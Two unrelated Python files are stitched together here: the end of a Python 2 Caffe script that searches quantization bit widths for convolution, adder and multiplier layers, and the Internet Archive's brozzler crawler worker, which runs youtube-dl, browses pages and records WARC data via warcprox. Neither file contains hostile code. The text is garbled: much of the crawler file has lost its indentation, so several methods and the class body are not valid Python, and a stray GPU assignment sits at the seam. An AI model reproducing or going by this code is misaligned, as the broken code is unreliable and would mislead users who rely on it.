    #    write_to_prototxt(net_proto, './temp'+str(i+1)+'.prototxt')
    #    p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-'+str(i+1)+'-32-32',
    #                                 './temp'+str(i+1)+'.prototxt',
    #                                 shared_dict,GPU2))
    #    jobs.append(p2)
    #    p2.start()
    #    for proc in jobs:
    #        proc.join()
    #    timer.toc()
    #    for j in range(i, i+2):
    #        print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-'+str(j)+'-32-32'],timer.total_time)
    #    for j in range(i, i+2):
    #        if shared_dict['32-32-'+str(j)+'-32-32'] > (full_ap - args.error_margin):
    #            bw_output = j
    #            not_found = False
    #            break;
    #    i = i + 2
    # Analyze input and output of layers
    #bw_h = 16
    #bw_l = 0
    #bw = 16
    #print 'Analyzing layer output'
    #print '\tbit width\t accuracy'
    #while True:
    #    net_proto = read_from_prototxt(args.prototxt_quantized)
    #    quantize_net_output(net, net_proto, net_output_IL, net_input_IL, bw)
    #    write_to_prototxt(net_proto, './temp.prototxt')
    #    ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #    print '\t{}bit:\t\t{}'.format(bw,ap)
    #    if ap < (full_ap - args.error_margin):
    #        bw_l = bw
    #    else:
    #        bw_h = bw
    #        bw_output = bw
    #    if bw_h - bw_l <=1:
    #        break
    #    bw = bw_l + (bw_h-bw_l)/2
    #Create 8-bit quantization model
    #if bw_conv < 8:
    #    bw_conv = 8
    #if bw_fc < 8:
    #    bw_fc = 8
    #if bw_output < 8:
    #    bw_output = 8
    #Make Final Quantized Prototxt
    # apply the (initial, not searched) bit widths and save the quantized
    # prototxt
    print 'Final Quantization Testing'
    net_proto = read_from_prototxt(args.prototxt_quantized)
    quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
    quantize_net_deconv(net_proto, net_param_IL, bw_conv, deconvIL_reduction)
    quantize_net_fc(net_proto, net_param_IL, bw_fc, fcIL_reduction)
    quantize_net_ndconv(net_proto, net_param_IL, bw_ndconv, ndconvIL_reduction)
    quantize_net_output(net_proto, net_output_IL, net_input_IL, bw_output, actIL_reduction)
    write_to_prototxt(net_proto, './temp.prototxt')
    #p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
    #                            shared_dict, GPU1))
    #p.start()
    #p.join()
    #ap = shared_dict['DQ-DQ-DQ-32-32']
    #layer_ap = ap
    #ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    print '----------------------------------------'
    print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
    #print 'Accuracy {}'.format(ap)
    print 'Dynamic fixed point net:'
    print '{}bit CONV and DECONV weights'.format(bw_conv)
    print '{}bit FC weights'.format(bw_fc)
    print '{}bit layer activations'.format(bw_output)
    print 'Please fine-tune'
    write_to_prototxt(net_proto, args.prototxt_quantized)
    print 'Quantized Model saved to', args.prototxt_quantized
    # NOTE(review): everything below this exit is dead code. If the exit
    # is ever removed, the adder/multiplier searches below will raise
    # NameError on `layer_ap` — its assignment above is commented out.
    sys.exit(0)
    print 'Create Bit-Accurate quantized prototxt'
    convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    print 'Loading Bit-Accurate quantized prototxt'
    #print 'Analyzing network adder and multiplier'
    net_adder_IL = manager.dict()
    net_multiplier_IL = manager.dict()
    if args.accumulator_analysis == None:
        print 'Analyzing network adder and multiplier'
        p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
                                    args=(net_adder_IL, net_multiplier_IL, GPU1))
        p.start()
        p.join()
        with open('accumulator_analysis.json', 'w') as outfile:
            accumulator_analysis = dict()
            accumulator_analysis['net_adder_IL'] = dict()
            accumulator_analysis['net_multiplier_IL'] = dict()
            for t in net_adder_IL.keys():
                accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
            for t in net_multiplier_IL.keys():
                accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
            json.dump(accumulator_analysis, outfile)
    else:
        print 'Loading network adder and multiplier analysis file'
        with open(args.accumulator_analysis) as json_data:
            accumulator_analysis = json.load(json_data)
            for t in accumulator_analysis['net_adder_IL'].keys():
                net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
            for t in accumulator_analysis['net_multiplier_IL'].keys():
                net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
    convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
    # search multiplier bit width two candidates at a time, one worker per
    # candidate, until accuracy is within 0.005 of layer_ap
    print 'Analyzing layer multiplier'
    print '\tbit width\t accuracy'
    i = bw_output
    not_found = True
    while not_found:
        timer = Timer()
        timer.tic()
        jobs = []
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
        p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
                                     './temp'+str(i)+'.prototxt',
                                     shared_dict,GPU1))
        jobs.append(p1)
        p1.start()
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
        p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
                                     './temp'+str(i+1)+'.prototxt',
                                     shared_dict,GPU2))
        jobs.append(p2)
        p2.start()
        for proc in jobs:
            proc.join()
        timer.toc()
        for j in range(i, i+2):
            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
        for j in range(i, i+2):
            if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
                bw_multiplier = j
                not_found = False
                break;
        i = i + 2
    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
    write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
    #bw_h = 16
    #bw_l = 0
    #bw = 16
    #print 'Analyzing layer multiplier'
    #print '\tbit width\t accuracy'
    #while True:
    #    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    #    quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
    #    write_to_prototxt(net_proto_BAC, './temp.prototxt')
    #    ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #    print '\t{}bit:\t\t{}'.format(bw,ap)
    #    if ap < (full_ap - args.error_margin):
    #        bw_l = bw
    #    else:
    #        bw_h = bw
    #        bw_multiplier = bw
    #    if bw_h - bw_l <=1:
    #        break
    #    bw = bw_l + (bw_h-bw_l)/2
    # same two-at-a-time search for the adder bit width
    print 'Analyzing layer adder'
    print '\tbit width\t accuracy'
    i = bw_output
    not_found = True
    while not_found:
        timer = Timer()
        timer.tic()
        jobs = []
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
        p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
                                     './temp'+str(i)+'.prototxt',
                                     shared_dict,GPU1))
        jobs.append(p1)
        p1.start()
        net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
        quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
        write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
        p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
                                     './temp'+str(i+1)+'.prototxt',
                                     shared_dict,GPU2))
        jobs.append(p2)
        p2.start()
        for proc in jobs:
            proc.join()
        timer.toc()
        for j in range(i, i+2):
            print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
        for j in range(i, i+2):
            if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
                bw_adder = j
                not_found = False
                break;
        i = i + 2
    #bw_h = 16
    #bw_l = 0
    #bw = 16
    #print 'Analyzing layer adder'
    #print '\tbit width\t accuracy'
    #while True:
    #    net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
    #    quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
    #    write_to_prototxt(net_proto_BAC, './temp.prototxt')
    #    ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
    #    print '\t{}bit:\t\t{}'.format(bw,ap)
    #    if ap < (full_ap - args.error_margin):
    #        bw_l = bw
    #    else:
    #        bw_h = bw
    #        bw_adder = bw
    #    if bw_h - bw_l <=1:
    #        break
    #    bw = bw_l + (bw_h-bw_l)/2
    # build the final bit-accurate prototxt with all searched widths and
    # evaluate it once
    print 'Create Final Bit-Accurate quantized prototxt'
    convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
    convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
    net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
    print 'Loading Final Bit-Accurate quantized prototxt'
    quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
    quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
    quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
    quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
    quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
    quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
    write_to_prototxt(net_proto_final, './temp_f.prototxt')
    p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
                                shared_dict,GPU1))
    p.start()
    p.join()
    ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
    #ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
    print '----------------------------------------'
    print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
    print 'Accuracy {}'.format(ap)
    print 'Dynamic fixed point net:'
    print '{}bit CONV and DECONV weights'.format(bw_conv)
    print '{}bit FC weights'.format(bw_fc)
    print '{}bit layer activations'.format(bw_output)
    print '{}bit adder'.format(bw_adder)
    print '{}bit multiplier'.format(bw_multiplier)
    print 'Please fine-tune'
    write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
    print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
    GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
|
worker.py | '''
brozzler/worker.py - BrozzlerWorker brozzles pages from the frontier, meaning
it runs youtube-dl on them, browses them and runs behaviors if appropriate,
scopes and adds outlinks to the frontier
Copyright (C) 2014-2017 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import logging
import brozzler
import brozzler.browser
import threading
import time
import youtube_dl
import urllib.request
import json
import PIL.Image
import io
import socket
import collections
import requests
import doublethink
import tempfile
import urlcanon
from requests.structures import CaseInsensitiveDict
import rethinkdb as r
import datetime
class ExtraHeaderAdder(urllib.request.BaseHandler):
    """urllib request handler that injects a fixed set of extra HTTP
    headers into every http/https request, without overriding headers the
    caller already set."""

    def __init__(self, extra_headers):
        self.extra_headers = extra_headers
        # urllib looks for <scheme>_request methods on handlers
        self.http_request = self._http_request
        self.https_request = self._http_request

    def _http_request(self, req):
        # Request.add_header stores keys capitalized, so compare the
        # capitalized form to detect already-present headers.
        for name, value in self.extra_headers.items():
            if name.capitalize() not in req.headers:
                req.add_header(name, value)
        return req
class YoutubeDLSpy(urllib.request.BaseHandler):
    """urllib handler that passively records every http/https transaction
    (url, method, status, headers) performed through its opener."""
    logger = logging.getLogger(__module__ + "." + __qualname__)

    def __init__(self):
        self.reset()

    def reset(self):
        # discard anything recorded so far
        self.transactions = []

    def _http_response(self, request, response):
        # record the transaction and pass the response through untouched
        self.transactions.append({
            'url': request.full_url,
            'method': request.get_method(),
            'status_code': response.code,
            'response_headers': response.headers,
        })
        return response

    http_response = https_response = _http_response

    def final_bounces(self, url):
        """
        Resolves redirect chains in self.transactions, returns a list of
        Transaction representing the final redirect destinations of the given
        url. There could be more than one if for example youtube-dl hit the
        same url with HEAD and then GET requests.
        """
        # XXX check http status 301,302,303,307? check for "uri" header
        # as well as "location"? see urllib.request.HTTPRedirectHandler
        redirects = {
            txn['url']: txn for txn in self.transactions
            if 'location' in txn['response_headers']}
        final_url = url
        while final_url in redirects:
            # pop each hop so a redirect cycle cannot loop forever
            final_url = redirects.pop(final_url)['response_headers']['location']
        return [txn for txn in self.transactions if txn['url'] == final_url]
class BrozzlerWorker:
logger = logging.getLogger(__module__ + "." + __qualname__)
HEARTBEAT_INTERVAL = 20.0
def __init__(
        self, frontier, service_registry=None, max_browsers=1,
        chrome_exe="chromium-browser", warcprox_auto=False, proxy=None):
    """Set up a worker that claims sites from `frontier` and brozzles them
    with up to `max_browsers` concurrent browsers.

    warcprox_auto: pick a warcprox instance from `service_registry` per
        site (mutually exclusive with `proxy`)
    proxy: fixed host:port proxy for all sites
    """
    self._frontier = frontier
    self._service_registry = service_registry
    self._max_browsers = max_browsers
    self._warcprox_auto = warcprox_auto
    self._proxy = proxy
    # the two proxy modes are mutually exclusive
    assert not (warcprox_auto and proxy)
    # lazily determined by _using_warcprox(); None == not yet probed
    self._proxy_is_warcprox = None
    self._browser_pool = brozzler.browser.BrowserPool(
        max_browsers, chrome_exe=chrome_exe, ignore_cert_errors=True)
    self._browsing_threads = set()
    self._browsing_threads_lock = threading.Lock()
    self._thread = None
    self._start_stop_lock = threading.Lock()
    self._shutdown = threading.Event()
def _proxy_for(self, site):
if self._proxy:
return self._proxy
elif site.proxy:
return site.proxy
elif self._warcprox_auto:
svc = self._service_registry.available_service('warcprox')
if svc is None:
raise brozzler.ProxyError(
'no available instances of warcprox in the service '
'registry')
site.proxy = '%s:%s' % (svc['host'], svc['port'])
site.save()
self.logger.info(
'chose warcprox instance %r from service registry for %r',
site.proxy, site)
return site.proxy
return None
def _using_warcprox(self, site):
if self._proxy:
if self._proxy_is_warcprox is None:
try:
response = requests.get('http://%s/status' % self._proxy)
status = json.loads(response.text)
self._proxy_is_warcprox = (status['role'] == 'warcprox')
except Exception as e:
self._proxy_is_warcprox = False
logging.info(
'%s %s warcprox', self._proxy,
'IS' if self._proxy_is_warcprox else 'IS NOT')
return self._proxy_is_warcprox
else:
return bool(site.proxy or self._warcprox_auto)
def _youtube_dl(self, destdir, site):
    """Build a youtube_dl.YoutubeDL instance configured for `site`.

    Downloads are written under `destdir`; requests go through the site's
    proxy (if any) and carry the site's extra headers. The returned
    instance has a `brozzler_spy` attribute (YoutubeDLSpy) recording
    every HTTP transaction youtube-dl performs.
    """
    def ydl_progress(*args, **kwargs):
        # in case youtube-dl takes a long time, heartbeat site.last_claimed
        # to prevent another brozzler-worker from claiming the site
        try:
            if site.rr and doublethink.utcnow() - site.last_claimed > datetime.timedelta(minutes=7):
                self.logger.debug(
                    'heartbeating site.last_claimed to prevent another '
                    'brozzler-worker claiming this site id=%r', site.id)
                site.last_claimed = doublethink.utcnow()
                site.save()
        except:
            # heartbeat is best-effort; never let it break the download
            self.logger.debug(
                'problem heartbeating site.last_claimed site id=%r',
                site.id, exc_info=True)
    ydl_opts = {
        "outtmpl": "{}/ydl%(autonumber)s.out".format(destdir),
        "verbose": False,
        "retries": 1,
        "logger": logging.getLogger("youtube_dl"),
        "nocheckcertificate": True,
        "hls_prefer_native": True,
        "noprogress": True,
        "nopart": True,
        "no_color": True,
        "progress_hooks": [ydl_progress],
        # https://github.com/rg3/youtube-dl/blob/master/README.md#format-selection
        # "best: Select the best quality format represented by a single
        # file with video and audio."
        "format": "best/bestvideo+bestaudio",
    }
    if self._proxy_for(site):
        ydl_opts["proxy"] = "http://{}".format(self._proxy_for(site))
        ## XXX (sometimes?) causes chrome debug websocket to go through
        ## proxy. Maybe not needed thanks to hls_prefer_native.
        ## # see https://github.com/rg3/youtube-dl/issues/6087
        ## os.environ["http_proxy"] = "http://{}".format(self._proxy_for(site))
    ydl = youtube_dl.YoutubeDL(ydl_opts)
    if site.extra_headers():
        ydl._opener.add_handler(ExtraHeaderAdder(site.extra_headers()))
    # attach a spy so callers can inspect the HTTP transactions afterwards
    ydl.brozzler_spy = YoutubeDLSpy()
    ydl._opener.add_handler(ydl.brozzler_spy)
    return ydl
def _warcprox_write_record(
        self, warcprox_address, url, warc_type, content_type,
        payload, extra_headers=None):
    """Ask warcprox to write a WARC record via its custom
    WARCPROX_WRITE_RECORD HTTP method.

    A 204 response is expected; anything else is logged. Connection-level
    failures are re-raised as brozzler.ProxyError.
    """
    headers = {"Content-Type":content_type,"WARC-Type":warc_type,"Host":"N/A"}
    if extra_headers:
        headers.update(extra_headers)
    request = urllib.request.Request(url, method="WARCPROX_WRITE_RECORD",
            headers=headers, data=payload)
    # XXX setting request.type="http" is a hack to stop urllib from trying
    # to tunnel if url is https
    request.type = "http"
    request.set_proxy(warcprox_address, "http")
    try:
        with urllib.request.urlopen(request) as response:
            if response.getcode() != 204:
                self.logger.warn(
                        'got "%s %s" response on warcprox '
                        'WARCPROX_WRITE_RECORD request (expected 204)',
                        response.getcode(), response.reason)
    # note: HTTPError must be handled before URLError since it is a
    # subclass of URLError — an http error status is only logged, while
    # a connection-level URLError/ConnectionError becomes a ProxyError
    except urllib.error.HTTPError as e:
        self.logger.warn(
                'got "%s %s" response on warcprox '
                'WARCPROX_WRITE_RECORD request (expected 204)',
                e.getcode(), e.info())
    except urllib.error.URLError as e:
        raise brozzler.ProxyError(
                'proxy error on WARCPROX_WRITE_RECORD %s' % url) from e
    except ConnectionError as e:
        raise brozzler.ProxyError(
                'proxy error on WARCPROX_WRITE_RECORD %s' % url) from e
def _remember_videos(self, page, ydl_spy):
if not 'videos' in page:
page.videos = []
for txn in ydl_spy.transactions:
if (txn['response_headers'].get_content_type().startswith('video/')
and txn['method'] == 'GET'
and txn['status_code'] in (200, 206)):
video = {
'blame': 'youtube-dl',
'url': txn['url'],
'response_code': txn['status_code'],
'content-type': txn['response_headers'].get_content_type(),
}
if 'content-length' in txn['response_headers']:
video['content-length'] = int(
txn['response_headers']['content-length'])
if 'content-range' in txn['response_headers']:
video['content-range'] = txn[
'response_headers']['content-range']
logging.debug('embedded video %s', video)
page.videos.append(video)
def _try_youtube_dl(self, ydl, site, page):
    """Run youtube-dl on page.url and, if using warcprox, push the
    resulting metadata json to warcprox as a WARC record.

    Translates youtube-dl failures: unsupported-url errors are ignored,
    http 420 becomes brozzler.ReachedLimit, URLError while proxied
    becomes brozzler.ProxyError, anything else propagates.
    """
    try:
        self.logger.info("trying youtube-dl on {}".format(page))
        # allow KeyboardInterrupt-style shutdown to reach this thread
        with brozzler.thread_accept_exceptions():
            info = ydl.extract_info(page.url)
        self._remember_videos(page, ydl.brozzler_spy)
        # logging.info('XXX %s', json.dumps(info))
        if self._using_warcprox(site):
            info_json = json.dumps(info, sort_keys=True, indent=4)
            self.logger.info(
                    "sending WARCPROX_WRITE_RECORD request to warcprox "
                    "with youtube-dl json for %s", page)
            self._warcprox_write_record(
                    warcprox_address=self._proxy_for(site),
                    url="youtube-dl:%s" % str(urlcanon.semantic(page.url)),
                    warc_type="metadata",
                    content_type="application/vnd.youtube-dl_formats+json;charset=utf-8",
                    payload=info_json.encode("utf-8"),
                    extra_headers=site.extra_headers())
    except brozzler.ShutdownRequested as e:
        raise
    except BaseException as e:
        # youtube-dl wraps the original exception; inspect e.exc_info to
        # classify what actually went wrong
        if hasattr(e, "exc_info") and e.exc_info[0] == youtube_dl.utils.UnsupportedError:
            # page simply has no extractable media; not an error
            pass
        elif (hasattr(e, "exc_info")
                and e.exc_info[0] == urllib.error.HTTPError
                and hasattr(e.exc_info[1], "code")
                and e.exc_info[1].code == 420):
            # 420 is warcprox's "reached limit" status
            raise brozzler.ReachedLimit(e.exc_info[1])
        elif (hasattr(e, 'exc_info')
                and e.exc_info[0] == urllib.error.URLError
                and self._proxy_for(site)):
            # connection problem when using a proxy == proxy error (XXX?)
            raise brozzler.ProxyError(
                    'youtube-dl hit apparent proxy error from '
                    '%s' % page.url) from e
        else:
            raise
def full_and_thumb_jpegs(self, large_png):
    """Convert a PNG screenshot to a pair of jpegs.

    Returns (full_jpeg, thumb_jpeg) as memoryview buffers: the full-size
    image re-encoded as jpeg, and a thumbnail scaled to 300px wide with
    the aspect ratio preserved.

    Fix: the thumbnail height was computed as a float and passed straight
    to PIL's Image.thumbnail, which expects integer dimensions; truncate
    it explicitly.
    """
    img = PIL.Image.open(io.BytesIO(large_png))

    out = io.BytesIO()
    img.save(out, "jpeg", quality=95)
    full_jpeg = out.getbuffer()

    thumb_width = 300
    # integer height preserving aspect ratio (Pillow floors floats
    # internally in recent versions; be explicit for older ones)
    thumb_height = int(thumb_width / img.size[0] * img.size[1])
    img.thumbnail((thumb_width, thumb_height))
    out = io.BytesIO()
    img.save(out, "jpeg", quality=95)
    thumb_jpeg = out.getbuffer()
    return full_jpeg, thumb_jpeg
def brozzle_page(self, browser, site, page, on_screenshot=None):
    """Brozzle one page: run youtube-dl on it, then either browse it in
    the browser (returning outlinks) or do a plain fetch if browsing
    isn't needed.

    Returns the list of outlinks discovered by browsing, or [] when the
    page was only fetched (or already fetched by youtube-dl).
    """
    self.logger.info("brozzling {}".format(page))
    try:
        # temp dir holds youtube-dl's downloads; discarded afterwards,
        # only the spy's transaction log is kept
        with tempfile.TemporaryDirectory(prefix='brzl-ydl-') as tempdir:
            ydl = self._youtube_dl(tempdir, site)
            ydl_spy = ydl.brozzler_spy # remember for later
            self._try_youtube_dl(ydl, site, page)
    except brozzler.ReachedLimit as e:
        raise
    except brozzler.ShutdownRequested:
        raise
    except brozzler.ProxyError:
        raise
    except Exception as e:
        if (hasattr(e, 'exc_info') and len(e.exc_info) >= 2
                and hasattr(e.exc_info[1], 'code')
                and e.exc_info[1].code == 430):
            # 430 is warcprox's "blocked by site limits" status
            self.logger.info(
                    'youtube-dl got %s %s processing %s',
                    e.exc_info[1].code, e.exc_info[1].msg, page.url)
        else:
            self.logger.error(
                    'youtube_dl raised exception on %s', page,
                    exc_info=True)
    # NOTE(review): if _youtube_dl() itself raises before ydl_spy is
    # assigned and the exception is swallowed above, the reference below
    # raises NameError — consider initializing ydl_spy = None up front.
    if self._needs_browsing(page, ydl_spy):
        self.logger.info('needs browsing: %s', page)
        outlinks = self._browse_page(browser, site, page, on_screenshot)
        return outlinks
    else:
        if not self._already_fetched(page, ydl_spy):
            self.logger.info('needs fetch: %s', page)
            self._fetch_url(site, page)
        else:
            self.logger.info('already fetched: %s', page)
        return []
def _browse_page(self, browser, site, page, on_screenshot=None):
    """Browse page.url in `browser` and return the discovered outlinks.

    Wires up two callbacks: one that forwards screenshots (and, when
    using warcprox, archives full-size and thumbnail jpegs as WARC
    resource records), and one that records video/* responses seen by
    chrome onto page.videos.
    """
    def _on_screenshot(screenshot_png):
        if on_screenshot:
            on_screenshot(screenshot_png)
        if self._using_warcprox(site):
            self.logger.info(
                    "sending WARCPROX_WRITE_RECORD request to %s with "
                    "screenshot for %s", self._proxy_for(site), page)
            screenshot_jpeg, thumbnail_jpeg = self.full_and_thumb_jpegs(
                    screenshot_png)
            self._warcprox_write_record(
                    warcprox_address=self._proxy_for(site),
                    url="screenshot:%s" % str(urlcanon.semantic(page.url)),
                    warc_type="resource", content_type="image/jpeg",
                    payload=screenshot_jpeg,
                    extra_headers=site.extra_headers())
            self._warcprox_write_record(
                    warcprox_address=self._proxy_for(site),
                    url="thumbnail:%s" % str(urlcanon.semantic(page.url)),
                    warc_type="resource", content_type="image/jpeg",
                    payload=thumbnail_jpeg,
                    extra_headers=site.extra_headers())
    def _on_response(chrome_msg):
        # chrome devtools Network.responseReceived message; record
        # successful video/* responses like _remember_videos does for
        # youtube-dl, but blamed on the browser
        if ('params' in chrome_msg
                and 'response' in chrome_msg['params']
                and 'mimeType' in chrome_msg['params']['response']
                and chrome_msg['params']['response'].get('mimeType', '').startswith('video/')
                and chrome_msg['params']['response'].get('status') in (200, 206)):
            video = {
                'blame': 'browser',
                'url': chrome_msg['params']['response'].get('url'),
                'response_code': chrome_msg['params']['response']['status'],
                'content-type': chrome_msg['params']['response']['mimeType'],
            }
            response_headers = CaseInsensitiveDict(
                    chrome_msg['params']['response']['headers'])
            if 'content-length' in response_headers:
                video['content-length'] = int(response_headers['content-length'])
            if 'content-range' in response_headers:
                video['content-range'] = response_headers['content-range']
            logging.debug('embedded video %s', video)
            if not 'videos' in page:
                page.videos = []
            page.videos.append(video)
    if not browser.is_running():
        browser.start(
                proxy=self._proxy_for(site),
                cookie_db=site.get('cookie_db'))
    final_page_url, outlinks = browser.browse_page(
            page.url, extra_headers=site.extra_headers(),
            behavior_parameters=site.get('behavior_parameters'),
            username=site.get('username'), password=site.get('password'),
            user_agent=site.get('user_agent'),
            on_screenshot=_on_screenshot, on_response=_on_response,
            hashtags=page.hashtags)
    if final_page_url != page.url:
        # remember the redirect so the frontier can dedupe on it
        page.note_redirect(final_page_url)
    return outlinks
def _fetch_url(self, site, page):
    '''
    Fetches page.url with a plain http GET (no browser), honoring the
    site's proxy and extra headers. The response body is discarded;
    proxy failures are re-raised as brozzler.ProxyError.
    '''
    if self._proxy_for(site):
        proxies = {
            scheme: 'http://%s' % self._proxy_for(site)
            for scheme in ('http', 'https')
        }
    else:
        proxies = None
    self.logger.info('fetching %s', page)
    try:
        # response is ignored
        requests.get(
                page.url, proxies=proxies, headers=site.extra_headers(),
                verify=False)
    except requests.exceptions.ProxyError as e:
        raise brozzler.ProxyError(
                'proxy error fetching %s' % page.url) from e
def _needs_browsing(self, page, brozzler_spy):
final_bounces = brozzler_spy.final_bounces(page.url)
if not final_bounces:
return True
for txn in final_bounces:
if txn['response_headers'].get_content_type() in [
'text/html', 'application/xhtml+xml']:
return True
return False
def _already_fetched(self, page, brozzler_spy):
for txn in brozzler_spy.final_bounces(page.url):
if (txn['method'] == 'GET' and txn['status_code'] == 200):
return True
return False
def brozzle_site(self, browser, site):
    '''
    Claims pages from `site` and brozzles them in `browser` for up to
    seven minutes, then disclaims the site so another worker can take
    over. All per-site exceptions are handled here so one bad site
    cannot kill the worker loop.
    '''
    try:
        start = time.time()
        page = None
        self._frontier.honor_stop_request(site)
        self.logger.info(
                "brozzling site (proxy=%r) %r",
                self._proxy_for(site), site)
        while time.time() - start < 7 * 60:
            site.refresh()
            self._frontier.honor_stop_request(site)
            page = self._frontier.claim_page(site, "%s:%s" % (
                socket.gethostname(), browser.chrome.port))
            if (page.needs_robots_check and
                    not brozzler.is_permitted_by_robots(
                        site, page.url, self._proxy_for(site))):
                # logging.warn is a deprecated alias; use warning()
                logging.warning("page %s is blocked by robots.txt", page.url)
                page.blocked_by_robots = True
                self._frontier.completed_page(site, page)
            else:
                outlinks = self.brozzle_page(browser, site, page)
                self._frontier.completed_page(site, page)
                self._frontier.scope_and_schedule_outlinks(
                        site, page, outlinks)
                if browser.is_running():
                    site.cookie_db = browser.chrome.persist_and_read_cookie_db()
            page = None
    except brozzler.ShutdownRequested:
        self.logger.info("shutdown requested")
    except brozzler.NothingToClaim:
        self.logger.info("no pages left for site %s", site)
    except brozzler.ReachedLimit as e:
        self._frontier.reached_limit(site, e)
    except brozzler.CrawlStopped:
        self._frontier.finished(site, "FINISHED_STOP_REQUESTED")
    # except brozzler.browser.BrowsingAborted:
    #     self.logger.info("{} shut down".format(browser))
    except brozzler.ProxyError as e:
        if self._warcprox_auto:
            logging.error(
                    'proxy error (site.proxy=%s), will try to choose a '
                    'healthy instance next time site is brozzled: %s',
                    site.proxy, e)
            site.proxy = None
        else:
            # using brozzler-worker --proxy, nothing to do but try the
            # same proxy again next time
            logging.error(
                    'proxy error (site.proxy=%r): %r', site.proxy, e)
    except:
        # deliberate catch-all boundary: log and keep the worker alive
        self.logger.critical("unexpected exception", exc_info=True)
    finally:
        if start:
            site.active_brozzling_time = (
                    site.active_brozzling_time or 0) + time.time() - start
        self._frontier.disclaim_site(site, page)
def _brozzle_site_thread_target(self, browser, site):
    '''
    Thread target wrapping brozzle_site(); guarantees that the browser
    is stopped and returned to the pool, and that this thread is
    deregistered, on any exit path.
    '''
    try:
        self.brozzle_site(browser, site)
    finally:
        browser.stop()
        self._browser_pool.release(browser)
        with self._browsing_threads_lock:
            self._browsing_threads.remove(threading.current_thread())
def _service_heartbeat(self):
if hasattr(self, "status_info"):
status_info = self.status_info
else:
status_info = {
"role": "brozzler-worker",
"ttl": self.HEARTBEAT_INTERVAL * 3,
}
status_info["load"] = 1.0 * self._browser_pool.num_in_use() / self._browser_pool.size
status_info["browser_pool_size"] = self._browser_pool.size
status_info["browsers_in_use"] = self._browser_pool.num_in_use()
try:
self.status_info = self._service_registry.heartbeat(status_info)
self.logger.trace(
"status in service registry: %s", self.status_info)
except r.ReqlError as e:
self.logger.error(
"failed to send heartbeat and update service registry "
"with info %s: %s", status_info, e)
def _service_heartbeat_if_due(self):
'''Sends service registry heartbeat if due'''
